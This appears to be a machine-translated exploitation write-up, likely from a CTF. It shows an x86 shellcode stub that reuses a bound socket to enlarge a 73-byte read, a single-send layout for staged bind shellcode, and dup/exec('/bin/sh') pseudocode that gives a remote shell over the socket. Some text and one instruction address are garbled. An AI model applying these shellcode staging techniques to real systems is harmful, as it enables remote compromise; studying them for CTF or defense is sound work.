From: syc
Using socket multiplexing to achieve pp200
However, this method is a little bloated ~
This method is also basically used by outsiders outside China.
However, there are still better methods to be discussed later
This is a method used by me and other people.
00000000 89EE mov esi, ebp; get new buffer address
00000002 68FF000000 push dword 0xff; len
00000007 56 push esi; buffer address
00000008 FF7508 push dword [ebp + 0x8]; socket fd
10000000b BB04110508 mov ebx, 0x8051104; ebx = readAll () address
00000010 FFD3 call ebx; call readAll ()-> recv ()
00000012 FFD6 call esi; call buffer shellcode
Ebp + 0x8 is the socket fd that has been bound () by this program.
So you just need to catch it and use it again.
The program calls readAll (fd, buffer, 73) once)
Gets the buffer very narrow. bind () shellcode cannot pass.
I used a lightweight shellcode to call it.
Call readAll again (fd, buffer, 255)
In this way, the breakthrough point is torn apart by a bigger mouth.
Allows it to receive 255 bytes
At the beginning, I wrote send () twice in a python script ()
First send () my socket copy () shellcode
The second send () My bind () shellcode
However, it seems that the bind () shellcode has not been called after sending ().
I used gdb for debugging and found that after the second call of readAll (fd, buffer, 255 ),
Then, the first part of socket copy () shellcode that exceeds 73 bytes is directly run: 0x42 0x42 0x42 0x0A = ~
Probably I understand. Actually, shellcode is completely beaten once.
Only recv () receives 73 bytes
More than 73 bytes are temporarily stored in the TCP stack cache.
I also consulted xi4oyu for confirmation.
When I call readAll (fd, buffer, 255) for the second time
In fact, the recv () function directly captures data from the TCP stack cache.
It's not the second data I sent () using python.
Therefore, you only need to use python send () to send data once.
The format for sending () is as follows:
Socket copy () shellcode + nops | (more than 73 bytes) + nops + bind () shellcode
The effect is as follows:
Bytes ----------------------------------------------------------------------------------------------------------
Another easier and more lightweight method is dup exec taught by xi4oyu.
Pseudocode is like this.
Dup (fd, 0)
Dup (fd, 1)
Exec ("/bin/sh ")
This means to redirect both the standard input and standard output to the socket fd.
In this way, when the shell is started again
In fact, from a local standard input and output bash shell to a rebound bash shell that interacts with the network .......
The system call number of dup () is also being tested.
After the image is ready, upload the image =. = ~